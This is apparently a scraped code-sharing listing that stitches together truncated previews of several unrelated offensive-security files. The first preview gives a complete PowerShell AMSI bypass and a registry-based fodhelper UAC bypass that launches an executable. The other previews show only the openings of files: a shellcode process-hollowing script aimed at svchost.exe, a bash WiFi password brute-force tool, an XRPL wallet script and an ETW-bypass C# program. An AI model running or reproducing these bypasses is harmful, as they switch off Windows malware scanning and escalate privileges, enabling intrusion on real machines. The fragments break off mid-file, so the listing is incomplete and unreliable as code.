This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Bypass AMSI | |
| $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1) | |
| #UAC Bypass | |
| New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value "C:\Users\bfarmer\Desktop\ph.exe" -Force | |
| New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force | |
| C:\Windows\System32\fodhelper.exe |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| DynWin32-ShellcodeProcessHollowing.ps1 performs shellcode based process hollowing using | |
| dynamically looked up Win32 API calls. The script obtains the methods GetModuleHandle, | |
| GetProcAddress and CreateProcess by using reflection. Afterwards it utilizes GetModuleHandle | |
| and GetProcAddress to obtain the addresses of the other required Win32 API calls. | |
| When all required Win32 API calls are looked up, it starts svchost.exe in a suspended state | |
| and overwrites the entrypoint with the specified shellcode. Afterwards, the thread is resumed | |
| and the shellcode is executed enveloped within the trusted svchost.exe process. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # ATTENTION!!! | |
| # Highly recommended to use with https://github.com/beardache/WiFiMap or https://forums.kali.org/showthread.php?23080-adstar-Wordlist-Generator-v1-0 (this one gives passwords quick right from stdout ;) | |
| # Attached version of wpa_cli binary was compiled for armv7 architecture. However you can find your architecture version in the internet. | |
| # Forked from https://github.com/rasta-mouse/Mjolnir | |
| ### text colours ### | |
| red='\e[0;31m' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from xrpl import wallet | |
| from xrpl.core import keypairs | |
| from xrpl.clients import JsonRpcClient | |
| from xrpl.account import get_account_info | |
| from xrpl.account.main import get_balance | |
| import requests | |
| import time | |
| import os | |
| def create_wallet(): |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Reflection; | |
| using System.Runtime.InteropServices; | |
| using System.Net; | |
| namespace ETW_Bypass | |
| { | |
| internal class Program | |
| { |